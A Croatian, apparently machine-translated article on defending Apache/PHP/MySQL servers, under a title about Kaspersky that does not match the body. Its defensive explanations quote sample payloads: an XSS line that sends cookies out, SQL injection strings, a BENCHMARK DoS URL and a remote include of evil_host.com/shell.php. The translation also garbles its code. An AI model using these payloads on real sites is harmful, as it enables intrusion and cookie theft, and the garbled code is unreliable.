Postavljanje antivirusne zaštite kroz Kaspersky Security Center. Konfiguriranje antivirusne zaštite Previše vremena


U ovom članku želio bih prikupiti neke vrste napada na poslužitelje i načine zaštite poslužitelja od hakera. Mnogo je knjiga i članaka napisano na temu sigurnosti. Naglasak ovog članka je na osnovnim pogreškama administratora i rješenjima za njihovo otklanjanje. Nakon čitanja ovog članka i provjere vlastitog servera, administrator također neće moći mirno spavati, može samo reći prošao sam "kandidatski minimum".

Upamtite administratore tri poslovice,
Ne! bolje ih isprintajte i objesite na svom radnom mjestu pred očima:
"Sigurnost je proces",
"Kad admin nema što raditi, on se bavi sigurnošću",
"Sigurnost definira najslabija karika"
Članak je namijenjen *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) administratorima i zaštiti poslužitelja od udaljenih napada, za ostale administratore, nadam se da će članak biti tema za razmišljanje.
Različite knjige imaju različite klasifikacije hakerskih napada, ja ću uvesti vlastitu podjelu u dvije uvjetne klase SVIH napada, razgrupirati ih:

  • Napad na servise koji su ranjivi i dostupni putem interneta

Da biste razumjeli moju podjelu, zamislite da postoji izmišljena skripta koja daljinski napada Apache na portu 80 i, kao rezultat napada, Apache se gasi, a vi ostajete bez svoje stranice, jer nema tko dati web stranice. Vašem sendmail poslužitelju pošte poslano je 1000 znakova umjesto kratkog korisničkog imena kao parametar VRFY-u, sendmail nije očekivao da će se to dogoditi i zatvorio se ostavljajući vas bez pošte. Općenito značenje napada ove uvjetne klase je da se iskorištava neka ranjivost aplikacije. I postoje tri načina -

  • path1) aplikacija će se srušiti i usluga neće biti dostupna, DoS situacija;
  • staza 2) aplikacija će početi hvatati resurse i nakon što ih iscrpi, izvršit će DoS;
  • path3) aplikacija će dobiti shellcode i napadačev kod će biti izvršen;

Sve su to napadi na uslugu (stavka 1) i tretiraju se na samo jedan način: administrator odmah sazna od programera o prisutnosti ranjivosti i ažurira ovaj program.

Napad na točku 2 je kada dinamički servis implementiran u nekom programskom jeziku dopušta primanje parametara i izvršava ih bez provjere. Na primjer, koristeći preglednik, napadač, puzeći kroz Apache stranicu, traži ranjivosti na samoj stranici i iskorištavajući ih, dobiva ono što želi. Napisan u Tcl-u, bot za moderiranje kanala IRC poslužitelja prima zahtjeve od korisnika (broj novog vica, datum u danu za prikaz vremena) i hakera, rekreirajući rad programskog koda bota (obrnuti inženjering ), konstruira zahtjeve koje autor bota nije uzeo u obzir.

Pitajte kako je? onda vam ovaj članak svakako treba. Na ovaj ili onaj način, ispod svega će biti obojeno.

Napad na ranjive servise i sam poslužitelj

U ovom dijelu uključio sam sve napade čiji utjecaj pada na sustav i usluge. Često su takvi napadi mogući zbog pogrešaka u implementaciji programa, kao što je prekoračenje međuspremnika (buffer overflow). Ukratko, to izgleda ovako, recimo u loše napisanom ftp poslužitelju postoji polje (buffer) za korisničko ime za određeni broj znakova (npr. 10), a takav ftp poslužitelj primi 100 znakova od bolesnog -wisher, ako takva situacija nije u označenom kodu ftp poslužitelja, dolazi do prekoračenja međuspremnika.

Dakle, što je lokalno prekoračenje međuspremnika korisno za hakere? Moguće je prebrisati povratnu adresu zlonamjernim kodom. Daljinski, ovo vam omogućuje izvršavanje proizvoljnog koda na ciljnom sustavu, lokalno, ako se program izvodi kao root, to će vam omogućiti da dobijete privilegije administratora sustava. Kod koji uzrokuje prekoračenje međuspremnika i izvodi radnje za hakera naziva se ljuska kod. Pisanje shellcodea nije lak zadatak i zahtijeva od hakera poznavanje asemblerskog jezika, što implicira profesionalizam u ovom području.

Zaštita od napada na ranjive servise i sam poslužitelj

  • Ažuriraj. Potrebno je naučiti ažurirati cijeli sustav i samim time moći
    "izgradite svijet i kernel" za *nix, ažurirajte putem sustava Linux paketa i možete kliknuti gumb Ažuriraj u Windows Updateu za licencirani MS Windows. FreeBSD administratori moraju moći instalirati softver koristeći portove. Na ovaj način ćete ploviti s programerima, a ne protiv njih.

    MS Windows administratori moraju se naviknuti i češće koristiti format distribucije MSI, koji Microsoft toplo preporučuje i podržava ažuriranje starog paketa s novim. Što god radili na svom poslužitelju, zapitajte se postoji li nova verzija ovog programa, koliko ju je lako ažurirati? Morate stvoriti rješenje nad kojim imate potpunu kontrolu, da, postoje projekti s vlastitim razvojem ili zakrpama, ali ako vaš razvoj zahtijeva zamrzavanje aplikacija koje su vam potrebne na određenoj verziji i ne možete primijeniti svoje zakrpe na novi sustav - takvo rješenje se NE isplati!

    Ovdje ću napraviti lirsku digresiju i ispričati vam kako sam se morao slomiti. Nakon što pročitate članke na Internetu koji obično počinju ovako, "preuzmite izvor i stavite ga da instalirate". Dakle, što je sljedeće? Kako ćete instalirati novu verziju? Zadržati staru verziju kako biste u njoj mogli (de|de)instalirati? I u novom make instalirati opet? Ova pitanja je postavio moj prijatelj Dmitry Dubrovin kada smo počeli učiti FreeBSD. Počeo sam shvaćati da je bio u pravu, i barem za Free, ovaj put nije prikladan, a ne slijedeći put FreeBSD programera, samo sam sebi otežao stvari.

    Sada, nakon savladavanja FreeBSD-a, kada nekoliko naredbi skine nove izvore za besplatni kernel i cijeli sustav, onda nekoliko naredbi kreira Novi svijet i kernel, a zatim se portovi i aplikacije u sustavu ažuriraju, počinjete shvaćati snagu *nix sustava. Teško je prenijeti ponos koji osjećate kada nadogradite poslužitelj s FreeBSD-om sa stare grane na sadašnju, ponovno izgradite svijet sustava, kada se sustav kompajlira iz novih izvora (izgleda kao da se Munchausen povukao za kosu) i sve koji je radio prije nadogradnje također radi "bez datoteke".

    Kao što ste već shvatili, morate se pretplatiti na sigurnosne mailing liste od programera softvera koji podržava vaše poslovanje i povremeno se ažurirati. Obnova svega i svačega mora se usavršiti i staviti na tračnice.

  • Sigurnosno podešavanje. Većina operacijskih sustava za poslužitelje ne dolaze dovoljno konfigurirani, prema zadanim postavkama, za rad u oštrom "kemijskom" okruženju Interneta. Kako hakeri "ne bi prevarili" vaš poslužitelj potrebno je izvršiti sigurnosno podešavanje, odnosno pročitati preporuke proizvođača operativnog sustava o sigurnosti. Admini *nix sustava mogu nazvati man security i nakon čitanja savjeta programera ostvariti bajku. No, bez obzira na operativni sustav, trebate pažljivo testirati rad poslužitelja i usluga nakon sigurnosnog podešavanja.
  • vatrozid. Konfigurirani vatrozid koji ste osobno provjerili pomoću nmap skenera portova i skenera ranjivosti, ako postoji izlaz iz ovih programa, razumijete li što je u pitanju? Prilikom postavljanja vatrozida imajte na umu da postoje načini za zaobilaženje njegovih pravila. Na primjer, postoji lokalna mreža zaštićena vatrozidom, postavljanjem oznake zabrane fragmentacije paketa moguće je u određenim situacijama doći do odredišta u lokalnoj mreži. Ili uobičajena greška administratora, pretjerano povjerenje u odlazne pakete vlastitog poslužitelja.

    Zamisliti stvarno stanje, neprijateljski kod pokušava pokrenuti vezu s hostom hakera, a vi imate pravilo vatrozida "sve je dopušteno od mene do interneta". Prilikom sastavljanja pravila vatrozida morate u potpunosti razumjeti cjelokupnu sliku mrežne komunikacije vaših usluga između sebe i udaljenih klijenata.

  • Sustav za detekciju upada. Firewall se može zamisliti kao kameni zidovi u blizini viteškog dvorca. Jednom postavljen i sjedi unutra - suho i udobno. Ali što ako netko već iz topa ispituje čvrstoću zidova? Možda već trebate pogledati iz dvorca i nasrnuti na nekoga? Da biste znali što se događa iza zidova dvorca, onih vani, trebate imati sustav za otkrivanje upada (IDS) na poslužitelju. Ako imate takav sustav baziran na paketu koji vam se sviđa, onda ako netko počne pucati iz nmap pištolja, tada ćete biti svjesni, a napadač će također biti svjestan "što znate".
  • Analiza nestandardnih situacija. U brojnim dnevnicima u sustavu često bljeskaju natpisi "greška: nije otvorena datoteka /etc/passwd" ili "pristup zabranjen". To su zvončići koji zvone o nekorektno konfiguriranoj aplikaciji koja ne može nešto, negdje pročitati, ili možda nije zvono, nego alarm koji upozorava na hakera koji je na pola puta.

    U svakom slučaju, admin bi trebao biti svjestan takvih stvari. Kako bi se olakšao rad administratora, stvoreni su programi koji će analizirati zapise na pojavu zanimljivih fraza i poslati izvješće administratoru poštom. Nemojte prezirati takvu priliku, takvi su programi usporedivi sa čuvarima koji provjeravaju na pouzdanom putu, ali ponašaju li se svi kako je propisano?

  • Uklonite verzije softvera. Uklonite bannere sa svojih usluga. Ne, ne one bannere koje prikazujete na svojoj stranici, već one retke koje vaši programi daju kao pozdrave prilikom povezivanja ili u ispisu pogreške. Nema potrebe da blistate s verzijama svojih programa, hakeri traže na internetu dostupne programe koji iskorištavaju ovu ili onu ranjivost (exploits - exploit) po verzijama.

    Ovdje nema jedinstvenog rješenja, na primjer, ako instalirate određeni program s portova, onda nemojte pisati make install clean, pa će se bez vas sve skinuti, kompajlirati i instalirati. Bolje napraviti dohvat; napraviti ekstrakt; zatim idite u poddirektorij s datotekama i tamo možete ispraviti verziju programa u izvorima ili je proslijediti kao drugu, a zatim samo instalirati čistu.

    Apache je vrlo informativan izvan mjesta i još uvijek blista s verzijama sustava, PHP, Perl, OpenSSL. Sramota je onemogućena navođenjem direktiva u httpd.conf ServerSignature Off ServerTokens Prod. Na internetu možete pronaći pomoć za zamjenu bannera bilo kojim programom. Cilj je isti - uskratiti napadaču vrijedne informacije. Gledajući svoj popis usluga dostupnih na Internetu, zapitajte se daje li previše informacija o sebi i informacijama koje pohranjuje.

    Na primjer, povezivanje DNS poslužitelja može dopustiti "prijenos zone" i vaša računala sa svojim IP i imenima domena bit će dostupna svima, što je loše. Provjerite svoj poslužitelj raznim skenerima i pažljivo pročitajte njihove rezultate. Prilikom zamjene bannera programa, savjetujem vam da ne umetnete nasumični tekst, već upozorenje o odgovornosti i da se radnje bilježe. Budući da je bilo incidenata kada je haker pušten u sudnici, jer je na hakiranom FTP serveru stajao natpis "Dobro došli! Dobro došli!".

  • Pravilo minimalnog zahtjeva. Minimizirajte dostupne usluge za Internet. Onemogućite ono što vam ne treba, jer ne možete hakirati ono što je onemogućeno. Uobičajena greška, na primjer, kada je MySQL poslužitelj, uparen s Apacheom na istom stroju, konfiguriran da mu se može pristupiti daljinski na svom standardnom priključku 3306. Zašto? Dajte naredbu netstat -na | grep SLUŠAJTE i dajte si odgovor: znate li koji programi koriste koje sučelje i koji port? Imate li kontrolu? Pa ako je tako.
  • Mnogo jakih i različitih lozinki. Često u videima o hakiranju ili pričama hakera o hakiranju treperi izraz "dobro je da je admin imao jednu lozinku za admin panel, koja je išla i do ssh i ftp". Nadam se da se ne radi o tebi. Otuda pravilo: lozinke za različite usluge moraju biti različite i duge najmanje 16 znakova. Neka se zapišu na komad papira ako se bojite zaboraviti (na ovom mjestu me sigurnosni stručnjaci ubiju), ali to je bolje nego da vam za nekoliko minuta udaljeni napadač dešifrira lozinku, jer je mala duljina lozinka i sličnost riječi iz rječnika omogućili su to.

    Različite lozinke za različite usluge lako je napraviti ako se usluge neće autorizirati kao korisnici sustava u /etc/passwd bazi podataka, već kao virtualni u svojim planarnim ili DBMS bazama podataka. Nemojte pohranjivati ​​lozinke na poslužiteljima u datoteci password.txt za sve resurse kojima vi kao administrator imate pristup.

  • Ograničenje. Sve vaše usluge na poslužitelju moraju se pokretati s različitih ograničenih računa (račun) i nikada se ne pokreću s root računa. Vjerujte mi, ako dođu do eskalacije privilegija s ograničenog računa na root status (uid=0, gid=0), spasit će vas nepostojanje poznatih rupa u vašem ažuriranom sustavu.

    Usput, mnogi administratori zaboravljaju tako nešto, zašto bi, na primjer, računi za pokretanje Apachea i MySQL-a trebali imati pristup ljusci! Uostalom, ovo se može onemogućiti i umjesto shell-a navesti /bin/false. Pa, iskreno, provjeri svoje račune za programe na poslužitelju za izvješćivanje i reci mi ako griješim. U svojim SQL bazama podataka ograničite račune na minimalne potrebne privilegije. Nemojte davati privilegije FILE kada se poziva samo SELECT.

  • Svi u zatvor! Naučite kako raditi s pješčanicima (sandbox) ili zatvorima (zatvor) i pokretati aplikacije u ovim izoliranim sobama, to će otežati hakiranje cijelog poslužitelja. Ako koristite virtualizaciju, tada možete širiti usluge na različite gostujuće operativne sustave.
  • Slojevita obrana. Nešto je moguće zabraniti na više načina na različitim mjestima – učinite to. NIKADA ne mislite - zabranio sam ovdje, ondje zabraniti suvišno.

Saznajte više o napadima na ranjive usluge i sam poslužitelj.

  • DoS napad (Denial of Service) - napad čiji je cilj ubiti bilo koji ograničeni resurs poslužitelja (internetski kanal, RAM, procesor itd. itd.) tako da poslužitelj ne može služiti legitimnim korisnicima. Slikovito rečeno, zamislite da vas je uljez nazvao kući i šutio na telefon, i to je trajalo cijelu večer. Dosta vam je svega ovoga i isključili ste telefon, a ujutro ste saznali da ste propustili važan poziv od šefa. Evo analogije iz stvaran život DoS napadi.

    U stvarnom životu DoS često izgleda ovako, zbog buga u programu, korištenje procesora skoči i dugo ostaje na 100%, a napadač povremeno iskorištava tu rupu u programu. Loše napisana aplikacija može ostati bez RAM-a. Ili "mail bomba" u obliku jako komprimirane datoteke u arhivi s mnogo znakova [razmaka], koja će biti raspakirana radi provjere od strane antivirusa i raspakirana ogromna datoteka će preliti particiju tvrdog diska na poslužitelju i/i izazvati ponovno pokretanje poslužitelja.

    Zaštita od DoS napada:

    • Ažuriranje programa kojim se manipulira za DoS napad
    • Postavite kvote resursa za račun pod kojim se ovaj program izvodi. *nix sustavi vam omogućuju podešavanje postotka upotrebe CPU-a, RAM-a, broja pokrenutih procesa, otvorenih datoteka itd. i tako dalje.
    • Postavite logovanje u program i pokušajte pronaći napadača-lutkara i blokirati ga u vatrozidu.
    • Postavite program prema savjetima programera, gurua, prema člancima na internetu, ako se nađete u takvoj situaciji.
  • DDoS (isti DoS, ali ste napadnuti s nekoliko zombi računala, na čelu s
    napadač). DDoS je destruktivan i koriste ga samo oni vandali koji imaju krdo zombi strojeva i tražit će novac da zaustave napad ili nanesu štetu vašem poslovanju tako da korisnici, bez da dođu do vašeg servera, odu kod konkurencije. DDoS napade ne koriste hakeri kojima je cilj intelektualno hakirati vaš server, da, da, vaš server je "misterij" koji žele "riješiti".

    Kako se zaštititi od DDoS-a? Ako se oslanjate na vlastite snage i sredstva, automatizacijom rada skripti možete izvući IP adrese iz raznih zapisa i unijeti ih u zabranjujuća pravila vatrozida. Tako je, primjerice, učinio autor članka „Ima li života pod DDoS-om?" u časopisu Hacker. Blokirajte mreže napadača u vatrozidu, šteta od DDoS-a može se smanjiti ako čitate članke o konfiguraciji svojih programa i slijedite ove upute. mnogi članci o tome kako ga konfigurirati da minimizira DDoS štetu.

    Zaštita od DDoS napada:

    • Ako je DDoS usmjeren na aplikaciju, pokušajte u zapisima pronaći razliku između napadača i legitimnih korisnika, te automatiziranjem skriptom unesite to u pravila vatrozida u deny
    • Ako je DDoS usmjeren na sustav (na primjer, napad preko ICMP protokola), automatizacijom sa skriptom dodajte ga pravilima vatrozida u zabrani
    • Postavite kvote resursa za račun pod kojim se ovaj program izvodi. * nix sustavi vam omogućuju da konfigurirate postotak upotrebe CPU-a, RAM-a, broja pokrenutih procesa, otvorenih datoteka itd.
    • Postavite program prema savjetima programera, gurua, prema člancima na internetu, ako se nađete u takvoj situaciji
    • Obratite se svom uzlaznom davatelju usluga kako biste pomogli na bilo koji način. Napišite žalbu na abuse@host_of_networks_from_the_attack_domain. To će pomoći da se djelomično uništi mreža napadača, neka pretrpi štetu, to ga košta. Doživite moralno zadovoljstvo.
    • Provjerite mod_security za Apache, izvrstan je alat koji će vam pomoći u nekim situacijama.
  • Bruteforce napad lozinkom. Ovdje nisu krive rupe u programima, oni samo grubo odabiru par prijava / lozinka. Oni koji su napustili poslužitelj s konfiguriranim ssh-om, ali su zaboravili ograničiti pristup putem ssh-a s određenih IP-ova i s određenim prijavama (direktiva u ssh_config AllowUser), sigurno su u zapisima vidjeli pokušaje grubog forsiranja lozinke mash:password_machine.

    Bruteforce zaštita lozinkom:

    • Ograničite broj neuspješnih pokušaja prijave/lozinke
    • Ako aplikacija dopušta, postavite povećanje vremena prije novog pokušaja prijave / lozinke.
    • Ako uzak krug ljudi treba raditi s aplikacijom, stvorite takvo pravilo i ograničite ga na
Napad kroz dinamički sadržaj usluge

Ova vrsta napada često se događa na hrpu Apache + (PHP | PERL) + (MySQL | PostgreSQL) za *nix svijet i IIS + ASP + Microsoft SQL Server za MS Windows svijet koristeći jednostavan preglednik, ali ovo je samo poseban slučaj, koji se samo češće koristi zbog popularnosti weba. U ovom paketu, programski jezici su ASP, PHP, Perl, SQL, tako da će ih hakeri često koristiti za sastavljanje svojih destruktivnih dizajna.

ALI najvažnije je razumjeti da takvi ligamenti usluga + dinamički sadržaj povrh njih ima ih mnogo u programskim jezicima i stoga su svi pod udarom hakera. Na primjer, ovdje je nepotpun popis:

  • Web poslužitelj + CGI skripte
  • Prastari link koji se više ne koristi - Apache + PHF (odnosno P H F) skripte
  • IIS + ColdFusion Application Server
  • SSI mehanizam (uključuje poslužiteljsku stranu)

Zatim ćemo uglavnom govoriti o web hakiranju, ali ne zaboravite da sve što je opisano u nastavku vrijedi i za ostale usluge + pakete dinamičkog sadržaja. Riječi su različite, ali suština je ista. Danas hakeri napadaju web preglednikom, sutra R klijentom protiv usluge Z. Web poslužitelj, sam povezan s bazama podataka i brojnim programskim jezicima, postao je platforma za napade ove vrste.

Smisao svih napada ove vrste je pokušati ispitati stranicu pomoću preglednika kako bi se pronašle greške u skriptama koje služe dinamičkom sadržaju (sadržaju) stranice.

Stoga zaključak - hakiranje stranice napadom na web na kojoj se nalaze samo statične html stranice koje samo referiraju jedna na drugu je NEMOGUĆE. Napadi putem vaše web stranice nastali su kada su ljudi željeli više interaktivnosti i dodali je kroz programske jezike i baze podataka.

Hakeri koji surfaju web mjestom posebnu pozornost obraćaju na skripte kojima se prosljeđuje bilo koji parametar. Ali što ako autor skripte ne provjeri što je točno proslijeđeno kao vrijednost parametra?

Opća rješenja za admine od napada na dinamički sadržaj servisa (Web stranica kao poseban slučaj)

  • Ažuriraj. Već smo razgovarali o tome, ali ako koristite razvoj trećih strana (motore foruma, galerije, chatove itd.), tada ćete dobiti izvješća o ranjivostima i rupama za zakrpe. Mišljenje hakera je da ako portal radi s financijama i njihovim prometom, onda nije poželjno da takav portal ima tuđe razvoje, osim vlastitih. Naravno, podrazumijeva se da su razvoj vlastitih motora za stranicu napisali koderi koji znaju sigurno programirati i razumiju se u prijetnje na internetu.
  • Budite nestandardni. U mnogim hakerskim uslužnim programima, baze podataka ranjivosti, forum/, galerija/, slike/ staze često bljeskaju. Vrlo udobno! Znaj admina, pola će ti brijati i pljuvati po stranici kad ti se stranica ne nalazi na /usr/www, a admin ti nije site.com/admin. Zaključak je, ako niste standardni, onda je ovo dodatni žbica u kotačima hakera koji napada vašu stranicu. Morat će dodati/ispraviti ručnu bazu podataka/skriptu. Ali je li haker uvijek u stanju ili voljan to učiniti? Mladi hakeri "script kiddies" sigurno će se uplašiti. Na primjer, PHP sigurnosni savjeti

    # Neka PHP kod izgleda kao druge vrste koda
    AddType aplikacija/x-httpd-php .asp .py .pl
    # Neka PHP kod izgleda kao kodovi nepoznatog tipa
    AddType aplikacija/x-httpd-php .bop .foo .133t
    # Neka PHP kod izgleda kao html
    AddType application/x-httpd-php .html .htm

    Ovaj oblik sigurnosti za PHP kroz skrivanje ima nekoliko nedostataka uz malu cijenu. Sami hakeri, opisujući svoje hakove, pišu da s web stranice programera preuzimaju isti softver koji se nalazi na vašem poslužitelju i gledaju s kojim zadanim nazivima tablica / stazama / ovaj ili onaj motor radi. Općenito značenje nestandardnog je odgoditi proces hakiranja kako haker ne bi imao "blitzkrieg", a što više povlači, veća je vjerojatnost da će biti otkriven.

  • Uklonite verzije motora i skripti na stranici. To je vrijedna informacija koju bi napadač trebao lišiti saznanja o verziji koju traži. rješenja ključ u ruke za hakiranje. Učinite to tako da vaše skripte ne prikazuju pogreške na pogreškama korisna informacija, kao što su: put do skripte gdje se pogreška dogodila (problem "otkrivanja putanje") i izlaz same pogreške.
  • Razmotrite potrebu za .htaccess. Prisutnost .htaccess datoteka znači da možete nadjačati svoje opcije postavljene u glavnoj konfiguraciji Apachea, vjerujte mi, hakeri će učiniti upravo to. Ako onemogućite korištenje .htaccess s "AllowOverride None" direktivom, tada ćete dobiti prednost performansi za Apache, budući da neće pregledavati sve direktorije na putu do web stranice na svaki zahtjev i povećati sigurnost Apache web poslužitelj.

Više o napadima na dinamički sadržaj (Web stranica kao poseban slučaj)

  • XSS (Cross Site Scripting).
    Cross-site skriptiranje naziva se XSS, a ne CSS, budući da je CSS rana kratica za "Cascading Style Sheets". XSS napadi nisu usmjereni protiv poslužitelja, već protiv korisnika tog poslužitelja. Ali admin se ne treba radovati! XSS napad izgleda ovako, web mjesto ima polja koja se mogu uređivati ​​na web stranici ili parametre skripte koje ne filtrira , javascript.

    Haker dodaje kod u programskom jeziku na strani klijenta, obično Java i VBScript, u ​​polja koja se mogu uređivati ​​i taj kod postaje dio HTML stranice. Kada korisnik posjeti takvu stranicu, njegov preglednik analizira stranicu i izvršava ovaj kod.
    Što hakeri rade s XSS-om?

    • Krađa kolačića (cookies, peciva) - ove tekstualne datoteke pohranjuju informacije koje poslužitelj "stavi" korisniku radi njegove naknadne identifikacije. U primjeru, ako stvorite datoteku test.html s ovim sadržajem (napišite je sami), tada će se prilikom pokretanja u pregledniku ispisati XSS.
      Poštovani administratore, došlo mi je do pogreške prilikom posjeta stranici
      Pomozite

      Ali možete napisati skriptu u Javi i ozbiljnije document.location="adresa primatelja kolačića"+document.cookie. Obično se takve skripte pišu na web-poštu administratora i pomoću društvenog inženjeringa pokušavaju ga natjerati da pročita poruku kako bi dobio svoje kolačiće.

      Ako u kolačićima nema poveznice na IP adresu i dodatnih sigurnosnih mjera, oni svoje kolačiće zamjenjuju administratorskim kolačićima i pokušavaju ući u administratorsku ploču koja ne provjerava prijavu i lozinku i identificira ljude samo pomoću kolačića.

    • Deface stranice (deface - zamjena početne stranice web stranice, najčešće index.html)
    • Trojanizacija udaljenog korisnika. Odabiru se svježi exploiti za preglednike korisnika i kada uđu na ranjivu stranicu, pokušava se zaraziti računalo trojancem. Ako korisnik ima instaliran antivirusni program sa svježim bazama podataka, on će naznačiti pojavu trojanca u sustavu. I vaša će stranica pasti u očima korisnika, možda vam više neće doći.
    • DoS. Uz veliki broj posjetitelja, skripta će dodatno tražiti još drugih stranica s vašeg poslužitelja ili s drugog, netko može imati DoS.

    Rješenje problema:

    • Da biste blokirali pisanje html oznaka u bazu podataka iz polja za unos, koristite konstrukcije poput htmlspecialchars za PHP, koji će zamijeniti< на на >, & do & i tako dalje
      Primjer,

      $komentar = htmlspecialchars($komentar, ENT_QUOTES);
      $query = "umetnuti u knjigu gostiju
      (ime, lokacija, e-pošta, url, komentar) vrijednosti
      ("$name", "$location", "$email", "$url", "$comment")");
      mysql_query($query) ili die(mysql_error());

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Naučite kako pravilno koristiti regularne izraze za raščlanjivanje dolaznih podataka. Za svoj programski jezik pronađite materijal koji vas uči kako sigurno kodirati.
    • Ako želite koristiti tehnologiju kolačića na svojoj web stranici, pročitajte našu Praksu sigurnosti kolačića. Ograničite njihove radnje vremenski i IP adresama.
    • Kao administrator, budite oprezni kad vas društveni inženjering prevari. Ne zaboravite na sigurnost osobnog računala iza vašeg klijentskog računala.
  • SQL injekcija. SQL injekcija.
    Ova bolest znači da je neprovjereni parametar zamijenjen u SQL upitu koji se pojavljuje u skripti. Haker pronalazi skripte koje pate od SQL injekcije na jednostavan način, citat site.com/view.php?id=1" se dodaje vrijednosti parametra ili se numerički parametar modificira kao ovaj site.com/view.php? id=2-1.

    Ako zamijenjeni citat uzrokuje "grešku" (puno poruka da se taj i takav zahtjev ne izvršava u toj i takvoj skripti na takvom putu), onda je takva skripta kandidat za daljnje pumpanje. Često napadači koriste Google hack, pitajući tražilicu nešto poput ovog "site: www.victim.ru Upozorenje". Google tražilica će vratiti netočne skripte na vašoj web stranici, toliko stare da ih je Google pauk odavno indeksirao .

    Kod koji ne provjerava vrijednost i pati od SQL injekcije

    $id = $_REQUEST["id"];
    $result = mysql_query("SELECT title, text, datenews, autor FROM `news` WHERE `id`="$id"");

    Sada zamislite da ćete umjesto broja biti zamijenjeni "-1 union select null/*" (bez navodnika) i tada će se vaš upit pretvoriti u

    SELECT naslov, tekst, datum vijesti, autor FROM `vijesti` WHERE `id`="-1 unija odaberite null/*"

    Odnosno, haker želi da se njegov zahtjev izvrši uz vaš zahtjev, u kombinaciji s vašim korištenjem union direktive. A onda će haker pokušati napraviti druge upite i, s obzirom na snagu SQL jezika, to ne sluti na dobro za administratora. Od deface (deface - zamjena početne stranice stranice) do dobivanja root prava na vašem poslužitelju. Haker također može izvršiti DoS napad zahvaljujući SQL injekciji: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) nekoliko takvih zahtjeva i poslužitelj je na 100% CPU-u dugotrajno opterećenje.

    Zaštita od SQL ubacivanja:

    • Opsežno koristite značajke SQL Servera kao što su pogledi i pohranjene procedure. Ovo će ograničiti neovlašteni pristup bazi podataka.
    • Prije prosljeđivanja parametra zahtjevu, mora se provjeriti njegov tip (za PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() i is_integer()) i, barem , navedeno korištenjem konstrukcije tipa addslashes za PHP.
    • Sve skripte rade s bazom podataka s nekog računa baze podataka, uklonite sve privilegije s ovog računa koje nisu potrebne za rad. Često hakeri koriste MySQL naredbu (MySQL je uzet kao primjer, ovo se odnosi na bilo koji SQL poslužitelj) "LOAD DATA INFILE" za čitanje datoteka koje su im potrebne sa poslužitelja i čitljivog računa pod kojim se pokreće MySQL. Stoga zaključak, onemogućite nepotrebne privilegije za svoje skripte, kao što je FILE, koje su potrebne za korištenje naredbe LOAD DATA INFILE. Kao temelj treba uzeti načelo "osnovnog minimuma".
    • Račun sustava pod kojim se pokreće SQL poslužitelj ne bi trebao imati pristup stranicama stranice i sistemskim datotekama poslužitelja.
  • Povezivanje datoteka. Uključi datoteku. Recimo da postoji stranica site.com/getnews.php?file=190607, ali autor skripte, koristeći include, povezuje stranicu bez provjera.

    $file = $_REQUEST["file"];
    uključi($datoteka.".html");

    Haker će zamijeniti evil_host.com/shell.php umjesto 190607 i tada će cijela adresna traka hakerskog preglednika izgledati ovako site.com/postnews.php?file=evil_host.com/shell.php i haker će imati vlastitu web ljusku na vašoj stranici s pravima koja ima Apache.

    Zaštita veze datoteke:

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Za svoj programski jezik pronađite materijal koji vas uči kako sigurno kodirati.
    • Hakeri jako vole kada vam programski jezik na web mjestu omogućuje pokretanje sistemskih naredbi. Stoga morate zabraniti pozivanje takvih funkcija u vašem programskom jeziku, ako je to, naravno, moguće. Na primjer, u postavkama PHP-a moguće je odrediti popis "zabranjenih" funkcija pomoću disable_functions u php.ini.
  • Trojanska slika
    Ako imate mogućnost učitavanja datoteka na poslužitelj na web mjestu, pripremite se na učitavanje, na primjer, slika avatara. Na slici u JPEG formatu postoji koncept metapodataka (zapamtite gdje kamera upisuje informacije prilikom snimanja kadra) i ti će metapodaci biti zapisani


    slika će se preimenovati u avatara.jpg.php kako bi se zaobišla većina provjera proširenja i koristit će site.com/upload_images/avatara.jpg.php?cmd=server_commands

    Trojanska zaštita:

    • Ispravno provjerite nastavak datoteke. Čak i ako ispravno obradite dopuštene datoteke, budite spremni da će slika iz jpg u php biti preimenovana pomoću druge ranjivosti na vašoj stranici. Provjerite metapodatke na slici pomoću funkcija poput exif_read_data() u PHP-u.
    • Spriječite izvođenje programskih jezika u direktorijima slika putem vašeg web poslužitelja. Da biste to učinili, pogledajte retke konfiguracije Apachea poput "AddType application/x-httpd-", koji povezuju programske jezike ​​​​s ekstenzijama datoteka i zabranjuju njihovo izvršavanje u direktorijima sa slikama. Za Apache će zabrana izvršavanja PHP jezičnih datoteka biti konstrukcija


      Narudžba odbiti, dopustiti
      Odbiti od svih

    • Za svoj programski jezik pronađite materijal koji vas uči kako sigurno kodirati prilikom obrade slika i njihovog ispravnog učitavanja na poslužitelj.

Osobna zahvala:

  • prijatelju Aleksandru Pupyshevu zvanom ris na kritici i savjetu
  • stranica antichat.ru/
  • www.xakep.ru/
  • knjiga Michaela Ebena, Briana Taimana. Administracija FreeBSD-a: Umijeće balansiranja
  • knjiga Joela Scambraya, Stuarta McClurea, Georgea Kurtza. Tajne hakera: Mrežna sigurnost - gotova rješenja. Drugo izdanje

Ostali izvori informacija o zaštiti:

  • FreeBSD man sigurnosna man stranica sadrži opis uobičajenih sigurnosnih problema i dobrih administrativnih praksi.
  • Pretplatite se na freebsd-security @ freebsd.org mailing liste. Da biste to učinili, pošaljite e-poštu na majordomo @ freebsd.org s subscribe freebsd-security u tijelu poruke. Upravo se na ovoj mailing listi najviše raspravlja stvarne probleme zaštita.
  • FreeBSD stranica sa sigurnosnim informacijama freebsd.org/security/
  • FreeBSD Sigurnosni dokument s uputama
  • Web stranica CERT.org sadrži informacije o ranjivosti ah u zaštiti svih operativnih sustava.
  • Vatrozidi i internetska sigurnost, William R. Cheswick i Steven M. Bellowin
  • Izgradnja internetskih vatrozida, 2. izdanje, Brent Chapman i Elizabeth Zwicky

Ishod:
Nadam se da vam je članak pomogao da sagledate sve probleme zajedno, sada administrator treba čitati o računalnoj sigurnosti, bazama podataka, web poslužiteljima, programskim jezicima iz dodatnih izvora. Ukratko rezimirajući članak, morate biti svjesni vijesti o oslobađanju sigurnosnih problema, ažurirati i provjeriti ispravnost svih ulaznih podataka u vašem razvoju.
Neka sila bude uz tebe!

